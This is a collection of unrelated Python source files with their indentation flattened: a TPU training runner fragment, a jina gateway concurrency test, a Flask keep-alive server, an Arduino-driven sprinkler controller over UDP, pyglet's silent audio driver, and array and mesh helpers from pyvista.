def initialize(self,
train_input_fn,
eval_input_fn,
model_fn,
train_batch_size,
eval_batch_size,
input_partition_dims=None,
init_fn=None,
train_has_labels=True,
eval_has_labels=True,
params=None,
num_partitions=None):
"""Build graphs for the TPU device and the input pipelines."""
num_cores_per_replica = 1
num_cores_per_replica = functools.reduce(
operator.mul, input_partition_dims
) if input_partition_dims else num_partitions if num_partitions else 1
self.device_assignment = device_assignment.device_assignment(
topology=self.device_topology,
computation_shape=_NUM_CORES_TO_COMPUTATION_SHAPE[
num_cores_per_replica],
num_replicas=self.num_replicas)
self.train_batch_size = train_batch_size
self.eval_batch_size = eval_batch_size
self.eval_has_labels = eval_has_labels
self.model_fn = model_fn
if params is None:
params = {}
params["dataset_num_shards"] = self.num_replicas // FLAGS.replicas_per_host
per_replica_train_batch_size = train_batch_size // self.num_replicas
per_replica_eval_batch_size = eval_batch_size // self.num_replicas
for i in range(self.num_replicas // FLAGS.replicas_per_host):
params["dataset_index"] = i
params["batch_size"] = per_replica_train_batch_size
self.build_enqueue_ops(train_input_fn, True, input_partition_dims, params)
if self.eval_steps > 0:
params["batch_size"] = per_replica_eval_batch_size
self.build_enqueue_ops(eval_input_fn, False, input_partition_dims,
params)
def train_step(_):
"""One train step."""
inp = self.infeed_op[True].generate_dequeue_op()
flatten_structure = tf.nest.flatten(self.feature_structure[True])
inp = [
tf.slice(i, [0] * i.shape.ndims, j.shape)
for i, j in zip(inp, flatten_structure)
]
if train_has_labels:
features, labels = tf.nest.pack_sequence_as(
self.feature_structure[True], inp)
else:
features = tf.nest.pack_sequence_as(self.feature_structure[True], inp)
labels = None
self.maybe_add_embedding_features(features, True)
train_op, _ = model_fn(features, labels, True)
embedding_train_op = self.maybe_get_embedding_train_op()
with tf.device(device_for_tpu_core(self.get_host(0))):
with tf.control_dependencies([train_op, embedding_train_op]):
return tf.constant(0)
@tpu_function.on_device_training_loop
def train_loop():
return training_loop.repeat(self.iterations_per_loop, train_step,
tf.constant(0))
def train_eval_step():
with tf.control_dependencies(train_loop()):
if self.eval_steps > 0:
return self.eval_loop()
else:
return tf.no_op()
@on_device_train_and_eval_loops
def train_eval_loop():
return training_loop.repeat(self.max_train_iterations, train_eval_step)
with self.graph.as_default():
(self.train_eval_op,) = tpu.shard(
train_eval_loop,
inputs=[],
num_shards=self.num_replicas,
outputs_from_all_shards=False,
device_assignment=self.device_assignment)
if FLAGS.model_dir:
tf.io.write_graph(self.graph, FLAGS.model_dir, "graph.pbtxt")
output_graph = tf.Graph()
if self.eval_steps > 0:
with output_graph.as_default():
flatten_output = tf.nest.flatten(self.predict_output)
self.dequeue_ops = [[] for _ in flatten_output]
tensor_dtypes = [v.dtype for v in flatten_output]
tensor_shapes = [v.shape for v in flatten_output]
is_padded_index = flatten_output.index(
self.predict_output[_IS_PADDED]
) if _IS_PADDED in self.predict_output else -1
for i in range(self.num_replicas // FLAGS.replicas_per_host):
with tf.device(device_for_host(self.get_host(i))):
host_dequeue_ops = [[] for _ in flatten_output]
for j in range(FLAGS.replicas_per_host):
replica_id = self.device_assignment.lookup_replicas(i, 0)[j]
ordinal = self.device_assignment.tpu_ordinal(
replica=replica_id, logical_core=0)
dequeue_ops = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal)
if is_padded_index >= 0:
num_non_pad = tf.shape(
dequeue_ops[is_padded_index])[0] - tf.reduce_sum(
tf.cast(dequeue_ops[is_padded_index], tf.int32))
dequeue_ops = [
tf.slice(k, [0] * k.shape.ndims,
[num_non_pad] + [-1] * (k.shape.ndims - 1))
for k in dequeue_ops
]
for k, item in enumerate(dequeue_ops):
host_dequeue_ops[k].append(item)
for k in range(len(self.predict_output)):
self.dequeue_ops[k].append(tf.concat(host_dequeue_ops[k], axis=0))
self.sess = tf.Session(self.master, graph=self.graph, config=self.config)
for is_training in [True, False]:
if is_training or self.eval_steps > 0:
for i in range(self.num_input_graphs):
with self.input_graph[is_training][i].as_default():
self.input_sess[is_training][i] = tf.Session(
self.master,
graph=self.input_graph[is_training][i],
config=self.config)
self.input_sess[is_training][i].run(
self.dataset_initializer[is_training][i])
self.output_sess = tf.Session(
self.master, graph=output_graph, config=self.config)
with self.graph.as_default():
_ = tf.train.get_or_create_global_step()
if init_fn:
init_fn()
checkpoint_path = tf.train.latest_checkpoint(
FLAGS.model_dir) if FLAGS.model_dir else None
if FLAGS.restore_checkpoint and checkpoint_path:
tf.train.Saver().restore(self.sess, checkpoint_path)
else:
self.sess.run(tf.global_variables_initializer())
self.sess.run(tf.local_variables_initializer())
self.maybe_load_embedding_vars()
self.global_step = self.sess.run(tf.train.get_global_step(self.graph))
def train_eval_thread_fn(sess, train_eval_op):
sess.run([train_eval_op])
# Start the just in time compilation of the model function
self.train_eval_thread = threading.Thread(
target=train_eval_thread_fn, args=(self.sess, self.train_eval_op))
self.train_eval_thread.start()
    # Sleep to give the just-in-time compilation time to finish.
time.sleep(FLAGS.sleep_after_init)
def train_and_eval(self,
eval_init_fn=None,
eval_finish_fn=None,
run_finish_fn=None):
"""Run the Train steps on the TPU device."""
if FLAGS.enable_summary:
output_dir = os.path.join(FLAGS.model_dir, "eval")
tf.gfile.MakeDirs(output_dir)
summary_writer = tf.summary.FileWriter(output_dir)
else:
summary_writer = None
    def infeed_thread_fn(thread_index):
      """Run the infeed session.run calls in a background thread."""
for _ in range(self.max_train_iterations):
self.input_sess[True][thread_index].run(
[self.enqueue_ops[True][thread_index]])
if self.eval_steps > 0:
if not self.eval_dataset_repeats:
self.input_sess[False][thread_index].run(
self.dataset_initializer[False][thread_index])
self.input_sess[False][thread_index].run(
[self.enqueue_ops[False][thread_index]])
infeed_threads = []
for i in range(self.num_input_graphs):
thread = threading.Thread(target=infeed_thread_fn, args=([i]))
thread.start()
infeed_threads.append(thread)
global_step = self.global_step
if self.eval_steps > 0:
enable_tracing = FLAGS.enable_profiling
if enable_tracing:
self.launch_profiler()
success = False
step_range = [global_step] if self.iterations_per_loop == 0 else range(
global_step, global_step + self.train_steps, self.iterations_per_loop)
for cur_step in step_range:
if not success and eval_init_fn:
eval_init_fn(cur_step)
eval_output = [[] for _ in self.dequeue_ops]
for _ in range(self.num_outfeeds):
for i, t in enumerate(self.output_sess.run(self.dequeue_ops)):
eval_output[i] += list(t)
eval_output = tf.nest.pack_sequence_as(self.predict_output, eval_output)
if eval_finish_fn and not success and eval_finish_fn(
cur_step, eval_output, summary_writer):
success = True
if enable_tracing and cur_step > self.train_steps // 4:
self.launch_profiler()
enable_tracing = False
if run_finish_fn:
run_finish_fn(success)
if FLAGS.save_checkpoint:
with self.graph.as_default():
self.global_step = self.sess.run(tf.train.get_global_step(self.graph))
checkpoint_path = FLAGS.model_dir + "/model.ckpt-%d" % self.global_step
tf.train.Saver().save(self.sess, checkpoint_path)
tf.logging.info("Checkpoint saved to %s", checkpoint_path)
if FLAGS.enable_summary:
summary_writer.close()
self.train_eval_thread.join()
for i in range(self.num_input_graphs):
infeed_threads[i].join()
self.sess.close()
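# Illustrative usage sketch (hypothetical input_fn/model_fn; not part of the
# original file):
#   runner = TrainAndEvalRunner(iterations_per_loop=100, train_steps=1000,
#                               eval_steps=10, num_replicas=8)
#   runner.initialize(train_input_fn, eval_input_fn, model_fn,
#                     train_batch_size=1024, eval_batch_size=1024)
#   runner.train_and_eval()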
|
test_gateway.py
|
import functools
import time
from threading import Thread
import numpy as np
import pytest
from jina import Document
from jina.enums import CompressAlgo
from jina import Flow
from tests import random_docs
@pytest.mark.slow
@pytest.mark.parametrize('compress_algo', list(CompressAlgo))
def test_compression(compress_algo, mocker):
response_mock = mocker.Mock()
f = Flow(compress=str(compress_algo)).add().add(name='DummyEncoder', shards=2).add()
with f:
f.index(random_docs(10), on_done=response_mock)
response_mock.assert_called()
@pytest.mark.slow
@pytest.mark.parametrize('protocol', ['websocket', 'grpc', 'http'])
def test_grpc_gateway_concurrency(protocol):
def _validate(req, start, status_codes, durations, index):
end = time.time()
durations[index] = end - start
status_codes[index] = req.status.code
def _request(f, status_codes, durations, index):
start = time.time()
f.index(
inputs=(Document() for _ in range(256)),
on_done=functools.partial(
_validate,
start=start,
status_codes=status_codes,
durations=durations,
index=index,
),
batch_size=16,
)
f = Flow(protocol=protocol).add(shards=2)
concurrency = 100
with f:
threads = []
status_codes = [None] * concurrency
durations = [None] * concurrency
for i in range(concurrency):
t = Thread(target=_request, args=(f, status_codes, durations, i))
threads.append(t)
t.start()
for t in threads:
t.join()
success = status_codes.count(0)
failed = len(status_codes) - success
print(
f'clients: {len(durations)}\n'
f'min roundtrip time: {np.min(durations)}\n'
f'max roundtrip time: {np.max(durations)}\n'
f'mean roundtrip time: {np.mean(durations)}\n'
)
assert success >= 1
    # In some slow environments a certain number of requests will fail.
    # Here we cap the allowed failure rate.
rate = failed / success
assert rate < 0.1
|
B.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return 'JDBot is up and running!!'
def run():
app.run(host='0.0.0.0', port=3000)
def b():
server = Thread(target=run)
server.start()
|
shpritz.py
|
import socket
import serial
import json
import threading
thresh = 30
trig = False
arduino = serial.Serial('/dev/ttyACM0', 9600) # open serial port
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.bind(("127.0.0.1", 3001))
def udp_thread():
global trig
while True:
data, addr = udp.recvfrom(1024) # buffer size is 1024 bytes
msg = json.loads(data)
if "man_trigger" in msg:
trig = msg["man_trigger"]
setShpritz(trig)
def setShpritz(state):
if state:
arduino.write('1')
else:
arduino.write('0')
message = json.dumps({"shpritz": state})
udp.sendto(message, ("127.0.0.1", 3002))
t = threading.Thread(target=udp_thread)
t.start()
if __name__ == '__main__':
while True:
distance = ord(arduino.read())
if not trig:
setShpritz(distance < thresh)
message = {"distance": distance}
udp.sendto(json.dumps(message), ("127.0.0.1", 3002))
|
silent.py
|
#!/usr/bin/env python
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import time
from pyglet.media import AbstractAudioPlayer, AbstractAudioDriver, \
MediaThread, MediaEvent
import pyglet
_debug = pyglet.options['debug_media']
class SilentAudioPacket(object):
def __init__(self, timestamp, duration):
self.timestamp = timestamp
self.duration = duration
def consume(self, dt):
self.timestamp += dt
self.duration -= dt
class SilentAudioPlayerPacketConsumer(AbstractAudioPlayer):
# When playing video, length of audio (in secs) to buffer ahead.
_buffer_time = 0.4
# Minimum number of bytes to request from source
_min_update_bytes = 1024
# Maximum sleep time
_sleep_time = 0.2
def __init__(self, source_group, player):
super(SilentAudioPlayerPacketConsumer, self).__init__(source_group, player)
# System time of first timestamp
self._timestamp_time = None
# List of buffered SilentAudioPacket
self._packets = []
self._packets_duration = 0
self._events = []
# Actual play state.
self._playing = False
# TODO Be nice to avoid creating this thread if user doesn't care
# about EOS events and there's no video format.
# NOTE Use thread.condition as lock for all instance vars used by worker
self._thread = MediaThread(target=self._worker_func)
if source_group.audio_format:
self._thread.start()
def delete(self):
if _debug:
print 'SilentAudioPlayer.delete'
self._thread.stop()
def play(self):
if _debug:
print 'SilentAudioPlayer.play'
self._thread.condition.acquire()
if not self._playing:
self._playing = True
self._timestamp_time = time.time()
self._thread.condition.notify()
self._thread.condition.release()
def stop(self):
if _debug:
print 'SilentAudioPlayer.stop'
self._thread.condition.acquire()
if self._playing:
timestamp = self.get_time()
if self._packets:
packet = self._packets[0]
self._packets_duration -= timestamp - packet.timestamp
packet.consume(timestamp - packet.timestamp)
self._playing = False
self._thread.condition.release()
def clear(self):
if _debug:
print 'SilentAudioPlayer.clear'
self._thread.condition.acquire()
del self._packets[:]
self._packets_duration = 0
del self._events[:]
self._thread.condition.release()
def get_time(self):
if _debug:
print 'SilentAudioPlayer.get_time()'
self._thread.condition.acquire()
packets = self._packets
if self._playing:
# Consume timestamps
result = None
offset = time.time() - self._timestamp_time
while packets:
packet = packets[0]
if offset > packet.duration:
del packets[0]
self._timestamp_time += packet.duration
offset -= packet.duration
self._packets_duration -= packet.duration
else:
packet.consume(offset)
self._packets_duration -= offset
self._timestamp_time += offset
result = packet.timestamp
break
else:
# Paused
if packets:
result = packets[0].timestamp
else:
result = None
self._thread.condition.release()
if _debug:
print 'SilentAudioPlayer.get_time() -> ', result
return result
# Worker func that consumes audio data and dispatches events
def _worker_func(self):
thread = self._thread
#buffered_time = 0
eos = False
events = self._events
while True:
thread.condition.acquire()
if thread.stopped or (eos and not events):
thread.condition.release()
break
# Use up "buffered" audio based on amount of time passed.
timestamp = self.get_time()
if _debug:
print 'timestamp: %r' % timestamp
# Dispatch events
while events and events[0].timestamp <= timestamp:
events[0]._sync_dispatch_to_player(self.player)
del events[0]
# Calculate how much data to request from source
secs = self._buffer_time - self._packets_duration
bytes = secs * self.source_group.audio_format.bytes_per_second
if _debug:
print 'Trying to buffer %d bytes (%r secs)' % (bytes, secs)
while bytes > self._min_update_bytes and not eos:
# Pull audio data from source
audio_data = self.source_group.get_audio_data(int(bytes))
if not audio_data and not eos:
events.append(MediaEvent(timestamp, 'on_eos'))
events.append(MediaEvent(timestamp, 'on_source_group_eos'))
eos = True
break
# Pretend to buffer audio data, collect events.
if self._playing and not self._packets:
self._timestamp_time = time.time()
self._packets.append(SilentAudioPacket(audio_data.timestamp,
audio_data.duration))
self._packets_duration += audio_data.duration
for event in audio_data.events:
event.timestamp += audio_data.timestamp
events.append(event)
events.extend(audio_data.events)
bytes -= audio_data.length
sleep_time = self._sleep_time
if not self._playing:
sleep_time = None
elif events and events[0].timestamp and timestamp:
sleep_time = min(sleep_time, events[0].timestamp - timestamp)
if _debug:
print 'SilentAudioPlayer(Worker).sleep', sleep_time
thread.sleep(sleep_time)
thread.condition.release()
class SilentTimeAudioPlayer(AbstractAudioPlayer):
    # Note that when using this player (automatic if playing back video with
    # an unsupported audio codec) no events are dispatched, because they are
    # normally encoded in the audio packets -- so no EOS events are delivered.
# This is a design flaw.
#
# Also, seeking is broken because the timestamps aren't synchronized with
# the source group.
_time = 0.0
_systime = None
def play(self):
self._systime = time.time()
def stop(self):
self._time = self.get_time()
self._systime = None
def delete(self):
pass
def clear(self):
pass
def get_time(self):
if self._systime is None:
return self._time
else:
return time.time() - self._systime + self._time
class SilentAudioDriver(AbstractAudioDriver):
def create_audio_player(self, source_group, player):
if source_group.audio_format:
return SilentAudioPlayerPacketConsumer(source_group, player)
else:
return SilentTimeAudioPlayer(source_group, player)
def create_audio_driver():
return SilentAudioDriver()
|
helpers.py
|
"""Supporting functions for polydata and grid objects."""
import collections.abc
import enum
import logging
import signal
import sys
import warnings
from threading import Thread
import threading
import traceback
import numpy as np
import scooby
import vtk
import vtk.util.numpy_support as nps
import pyvista
from .fileio import from_meshio
from . import transformations
class FieldAssociation(enum.Enum):
"""Represents which type of vtk field a scalar or vector array is associated with."""
POINT = vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS
CELL = vtk.vtkDataObject.FIELD_ASSOCIATION_CELLS
NONE = vtk.vtkDataObject.FIELD_ASSOCIATION_NONE
ROW = vtk.vtkDataObject.FIELD_ASSOCIATION_ROWS
def get_vtk_type(typ):
"""Look up the VTK type for a give python data type.
Corrects for string type mapping issues.
Returns
-------
int : the integer type id specified in vtkType.h
"""
typ = nps.get_vtk_array_type(typ)
# This handles a silly string type bug
if typ == 3:
return 13
return typ
def vtk_bit_array_to_char(vtkarr_bint):
"""Cast vtk bit array to a char array."""
vtkarr = vtk.vtkCharArray()
vtkarr.DeepCopy(vtkarr_bint)
return vtkarr
def vtk_id_list_to_array(vtk_id_list):
"""Convert a vtkIdList to a NumPy array."""
return np.array([vtk_id_list.GetId(i) for i in range(vtk_id_list.GetNumberOfIds())])
def convert_string_array(arr, name=None):
"""Convert a numpy array of strings to a vtkStringArray or vice versa.
Note that this is terribly inefficient - inefficient support
is better than no support :). If you have ideas on how to make this faster,
please consider opening a pull request.
"""
if isinstance(arr, np.ndarray):
vtkarr = vtk.vtkStringArray()
########### OPTIMIZE ###########
for val in arr:
vtkarr.InsertNextValue(val)
################################
if isinstance(name, str):
vtkarr.SetName(name)
return vtkarr
# Otherwise it is a vtk array and needs to be converted back to numpy
############### OPTIMIZE ###############
nvalues = arr.GetNumberOfValues()
return np.array([arr.GetValue(i) for i in range(nvalues)], dtype='|U')
########################################
def convert_array(arr, name=None, deep=0, array_type=None):
"""Convert a NumPy array to a vtkDataArray or vice versa.
Parameters
-----------
arr : ndarray or vtkDataArry
A numpy array or vtkDataArry to convert
name : str
The name of the data array for VTK
deep : bool
if input is numpy array then deep copy values
Returns
-------
vtkDataArray, ndarray, or DataFrame:
the converted array (if input is a NumPy ndaray then returns
``vtkDataArray`` or is input is ``vtkDataArray`` then returns NumPy
``ndarray``). If pdf==True and the input is ``vtkDataArry``,
return a pandas DataFrame.
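    Examples
    --------
    A minimal round-trip sketch (illustrative only, not part of the original
    docstring):
    >>> import numpy as np
    >>> vtkarr = convert_array(np.array([1.0, 2.0, 3.0]), name='my_scalars')
    >>> back = convert_array(vtkarr)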
"""
if arr is None:
return
if isinstance(arr, np.ndarray):
if arr.dtype is np.dtype('O'):
arr = arr.astype('|S')
arr = np.ascontiguousarray(arr)
if arr.dtype.type in (np.str_, np.bytes_):
# This handles strings
vtk_data = convert_string_array(arr)
else:
# This will handle numerical data
arr = np.ascontiguousarray(arr)
vtk_data = nps.numpy_to_vtk(num_array=arr, deep=deep, array_type=array_type)
if isinstance(name, str):
vtk_data.SetName(name)
return vtk_data
# Otherwise input must be a vtkDataArray
if not isinstance(arr, (vtk.vtkDataArray, vtk.vtkBitArray, vtk.vtkStringArray)):
raise TypeError(f'Invalid input array type ({type(arr)}).')
# Handle booleans
if isinstance(arr, vtk.vtkBitArray):
arr = vtk_bit_array_to_char(arr)
# Handle string arrays
if isinstance(arr, vtk.vtkStringArray):
return convert_string_array(arr)
    # Convert from vtkDataArray to NumPy
return nps.vtk_to_numpy(arr)
def is_pyvista_dataset(obj):
"""Return True if the Object is a PyVista wrapped dataset."""
return isinstance(obj, (pyvista.Common, pyvista.MultiBlock))
def point_array(mesh, name):
"""Return point array of a vtk object."""
vtkarr = mesh.GetPointData().GetAbstractArray(name)
return convert_array(vtkarr)
def field_array(mesh, name):
"""Return field array of a vtk object."""
vtkarr = mesh.GetFieldData().GetAbstractArray(name)
return convert_array(vtkarr)
def cell_array(mesh, name):
"""Return cell array of a vtk object."""
vtkarr = mesh.GetCellData().GetAbstractArray(name)
return convert_array(vtkarr)
def row_array(data_object, name):
"""Return row array of a vtk object."""
vtkarr = data_object.GetRowData().GetAbstractArray(name)
return convert_array(vtkarr)
def parse_field_choice(field):
"""Return the id of the given field."""
if isinstance(field, str):
field = field.strip().lower()
if field in ['cell', 'c', 'cells']:
field = FieldAssociation.CELL
elif field in ['point', 'p', 'points']:
field = FieldAssociation.POINT
elif field in ['field', 'f', 'fields']:
field = FieldAssociation.NONE
elif field in ['row', 'r',]:
field = FieldAssociation.ROW
else:
raise ValueError(f'Data field ({field}) not supported.')
elif isinstance(field, FieldAssociation):
pass
else:
raise ValueError(f'Data field ({field}) not supported.')
return field
def get_array(mesh, name, preference='cell', info=False, err=False):
"""Search point, cell and field data for an array.
Parameters
----------
name : str
        The name of the array to search for.
preference : str, optional
When scalars is specified, this is the preferred array type to
search for in the dataset. Must be either ``'point'``,
``'cell'``, or ``'field'``
info : bool
Return info about the array rather than the array itself.
err : bool
Boolean to control whether to throw an error if array is not present.
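    Examples
    --------
    An illustrative sketch (the mesh and array name here are hypothetical,
    not part of the original docstring):
    >>> import pyvista
    >>> mesh = pyvista.Sphere()
    >>> mesh.point_arrays['elevation'] = mesh.points[:, 2]
    >>> arr = get_array(mesh, 'elevation', preference='point')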
"""
if isinstance(mesh, vtk.vtkTable):
arr = row_array(mesh, name)
if arr is None and err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
field = FieldAssociation.ROW
if info:
return arr, field
return arr
parr = point_array(mesh, name)
carr = cell_array(mesh, name)
farr = field_array(mesh, name)
preference = parse_field_choice(preference)
if np.sum([parr is not None, carr is not None, farr is not None]) > 1:
if preference == FieldAssociation.CELL:
if info:
return carr, FieldAssociation.CELL
else:
return carr
elif preference == FieldAssociation.POINT:
if info:
return parr, FieldAssociation.POINT
else:
return parr
elif preference == FieldAssociation.NONE:
if info:
return farr, FieldAssociation.NONE
else:
return farr
else:
raise ValueError(f'Data field ({preference}) not supported.')
arr = None
field = None
if parr is not None:
arr = parr
field = FieldAssociation.POINT
elif carr is not None:
arr = carr
field = FieldAssociation.CELL
elif farr is not None:
arr = farr
field = FieldAssociation.NONE
elif err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
if info:
return arr, field
return arr
def vtk_points(points, deep=True):
"""Convert numpy points to a vtkPoints object."""
if not points.flags['C_CONTIGUOUS']:
points = np.ascontiguousarray(points)
vtkpts = vtk.vtkPoints()
vtkpts.SetData(nps.numpy_to_vtk(points, deep=deep))
return vtkpts
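# Illustrative sketch (editor addition): ``vtk_points`` wraps an (n, 3)
# NumPy array as ``vtk.vtkPoints``; ``deep=True`` copies the data into VTK.
def _example_vtk_points():
    pts = np.array([[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [0.0, 1.0, 0.0]])
    vtkpts = vtk_points(pts, deep=True)
    return vtkpts.GetNumberOfPoints()  # 3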
def line_segments_from_points(points):
"""Generate non-connected line segments from points.
    Assumes points are ordered as line segments and that an even number of
    points is given.
Parameters
----------
points : np.ndarray
Points representing line segments. An even number must be given as
every two vertices represent a single line segment. For example, two
line segments would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
Returns
-------
lines : pyvista.PolyData
PolyData with lines and cells.
Examples
--------
    This example plots two line segments at right angles to each other.
>>> import pyvista
>>> import numpy as np
>>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
    >>> lines = pyvista.line_segments_from_points(points)
>>> lines.plot() # doctest:+SKIP
"""
if len(points) % 2 != 0:
raise ValueError("An even number of points must be given to define each segment.")
# Assuming ordered points, create array defining line order
n_points = len(points)
n_lines = n_points // 2
lines = np.c_[(2 * np.ones(n_lines, np.int_),
np.arange(0, n_points-1, step=2),
np.arange(1, n_points+1, step=2))]
poly = pyvista.PolyData()
poly.points = points
poly.lines = lines
return poly
def lines_from_points(points, close=False):
"""Make a connected line set given an array of points.
Parameters
----------
points : np.ndarray
Points representing the vertices of the connected segments. For
example, two line segments would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]])
close : bool, optional
If True, close the line segments into a loop
Returns
-------
lines : pyvista.PolyData
PolyData with lines and cells.
"""
poly = pyvista.PolyData()
poly.points = points
cells = np.full((len(points)-1, 3), 2, dtype=np.int_)
cells[:, 1] = np.arange(0, len(points)-1, dtype=np.int_)
cells[:, 2] = np.arange(1, len(points), dtype=np.int_)
if close:
cells = np.append(cells, [[2, len(points)-1, 0],], axis=0)
poly.lines = cells
return poly
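# Illustrative sketch (editor addition): three points yield two connected
# segments, or three segments when ``close=True`` links the last point back
# to the first.
def _example_lines_from_points():
    pts = np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]], dtype=float)
    polyline = lines_from_points(pts)           # two 2-point line cells
    loop = lines_from_points(pts, close=True)   # three 2-point line cells
    return polyline, loop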
def make_tri_mesh(points, faces):
"""Construct a ``pyvista.PolyData`` mesh using points and faces arrays.
Construct a mesh from an Nx3 array of points and an Mx3 array of
triangle indices, resulting in a mesh with N vertices and M
triangles. This function does not require the standard VTK
"padding" column and simplifies mesh creation.
Parameters
----------
points : np.ndarray
Array of points with shape (N, 3) storing the vertices of the
triangle mesh.
faces : np.ndarray
Array of indices with shape (M, 3) containing the triangle
indices.
Returns
-------
tri_mesh : pyvista.PolyData
PolyData instance containing the triangle mesh.
Examples
--------
This example discretizes the unit square into a triangle mesh with
nine vertices and eight faces.
>>> import numpy as np
>>> import pyvista as pv
>>> points = np.array([[0, 0, 0], [0.5, 0, 0], [1, 0, 0], [0, 0.5, 0],
... [0.5, 0.5, 0], [1, 0.5, 0], [0, 1, 0], [0.5, 1, 0],
... [1, 1, 0]])
>>> faces = np.array([[0, 1, 4], [4, 7, 6], [2, 5, 4], [4, 5, 8],
... [0, 4, 3], [3, 4, 6], [1, 2, 4], [4, 8, 7]])
    >>> tri_mesh = pv.make_tri_mesh(points, faces)
>>> tri_mesh.plot(show_edges=True) # doctest:+SKIP
"""
if points.shape[1] != 3:
raise ValueError("Points array should have shape (N, 3).")
if faces.ndim != 2 or faces.shape[1] != 3:
raise ValueError("Face array should have shape (M, 3).")
cells = np.empty((faces.shape[0], 4), dtype=faces.dtype)
cells[:, 0] = 3
cells[:, 1:] = faces
return pyvista.PolyData(points, cells)
def vector_poly_data(orig, vec):
"""Create a vtkPolyData object composed of vectors."""
# shape, dimension checking
if not isinstance(orig, np.ndarray):
orig = np.asarray(orig)
if not isinstance(vec, np.ndarray):
vec = np.asarray(vec)
if orig.ndim != 2:
orig = orig.reshape((-1, 3))
elif orig.shape[1] != 3:
raise ValueError('orig array must be 3D')
if vec.ndim != 2:
vec = vec.reshape((-1, 3))
elif vec.shape[1] != 3:
raise ValueError('vec array must be 3D')
# Create vtk points and cells objects
vpts = vtk.vtkPoints()
vpts.SetData(nps.numpy_to_vtk(np.ascontiguousarray(orig), deep=True))
npts = orig.shape[0]
cells = np.empty((npts, 2), dtype=pyvista.ID_TYPE)
cells[:, 0] = 1
cells[:, 1] = np.arange(npts, dtype=pyvista.ID_TYPE)
vcells = pyvista.utilities.cells.CellArray(cells, npts)
# Create vtkPolyData object
pdata = vtk.vtkPolyData()
pdata.SetPoints(vpts)
pdata.SetVerts(vcells)
# Add vectors to polydata
name = 'vectors'
vtkfloat = nps.numpy_to_vtk(np.ascontiguousarray(vec), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveVectors(name)
# Add magnitude of vectors to polydata
name = 'mag'
scalars = (vec * vec).sum(1)**0.5
vtkfloat = nps.numpy_to_vtk(np.ascontiguousarray(scalars), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveScalars(name)
return pyvista.PolyData(pdata)
def trans_from_matrix(matrix): # pragma: no cover
"""Convert a vtk matrix to a numpy.ndarray.
DEPRECATED: Please use ``array_from_vtkmatrix``.
"""
# import needs to happen here to prevent a circular import
from pyvista.core.errors import DeprecationError
raise DeprecationError('DEPRECATED: Please use ``array_from_vtkmatrix``.')
def array_from_vtkmatrix(matrix):
"""Convert a vtk matrix to a ``numpy.ndarray``.
Parameters
----------
matrix : vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4
The vtk matrix to be converted to a ``numpy.ndarray``.
Returned ndarray has shape (3, 3) or (4, 4) as appropriate.
"""
if isinstance(matrix, vtk.vtkMatrix3x3):
shape = (3, 3)
elif isinstance(matrix, vtk.vtkMatrix4x4):
shape = (4, 4)
else:
raise TypeError('Expected vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4 input,'
f' got {type(matrix).__name__} instead.')
array = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
array[i, j] = matrix.GetElement(i, j)
return array
def vtkmatrix_from_array(array):
"""Convert a ``numpy.ndarray`` or array-like to a vtk matrix.
Parameters
----------
array : numpy.ndarray or array-like
The array or array-like to be converted to a vtk matrix.
Shape (3, 3) gets converted to a ``vtk.vtkMatrix3x3``, shape (4, 4)
gets converted to a ``vtk.vtkMatrix4x4``. No other shapes are valid.
"""
array = np.asarray(array)
if array.shape == (3, 3):
matrix = vtk.vtkMatrix3x3()
elif array.shape == (4, 4):
matrix = vtk.vtkMatrix4x4()
else:
raise ValueError(f'Invalid shape {array.shape}, must be (3, 3) or (4, 4).')
m, n = array.shape
for i in range(m):
for j in range(n):
matrix.SetElement(i, j, array[i, j])
return matrix
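# Illustrative sketch (editor addition): the two converters above are
# inverses of each other for valid (3, 3) and (4, 4) arrays.
def _example_matrix_roundtrip():
    transform = np.diag([2.0, 2.0, 2.0, 1.0])   # uniform scaling matrix
    vtkmat = vtkmatrix_from_array(transform)    # vtk.vtkMatrix4x4
    back = array_from_vtkmatrix(vtkmat)         # ndarray of shape (4, 4)
    return np.allclose(transform, back)         # True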
def is_meshio_mesh(mesh):
"""Test if passed object is instance of ``meshio.Mesh``."""
try:
import meshio
return isinstance(mesh, meshio.Mesh)
except ImportError:
return False
def wrap(dataset):
"""Wrap any given VTK data object to its appropriate PyVista data object.
Other formats that are supported include:
* 2D :class:`numpy.ndarray` of XYZ vertices
* 3D :class:`numpy.ndarray` representing a volume. Values will be scalars.
* 3D :class:`trimesh.Trimesh` mesh.
Parameters
----------
dataset : :class:`numpy.ndarray`, :class:`trimesh.Trimesh`, or VTK object
Dataset to wrap.
Returns
-------
wrapped_dataset : pyvista class
The `pyvista` wrapped dataset.
Examples
--------
Wrap a numpy array representing a random point cloud
>>> import numpy as np
>>> import pyvista
>>> points = np.random.random((10, 3))
>>> cloud = pyvista.wrap(points)
>>> cloud # doctest:+SKIP
PolyData (0x7fc52db83d70)
N Cells: 10
N Points: 10
X Bounds: 1.123e-01, 7.457e-01
Y Bounds: 1.009e-01, 9.877e-01
Z Bounds: 2.346e-03, 9.640e-01
N Arrays: 0
Wrap a Trimesh object
>>> import trimesh
>>> import pyvista
>>> points = [[0, 0, 0], [0, 0, 1], [0, 1, 0]]
>>> faces = [[0, 1, 2]]
>>> tmesh = trimesh.Trimesh(points, faces=faces, process=False)
>>> mesh = pyvista.wrap(tmesh)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
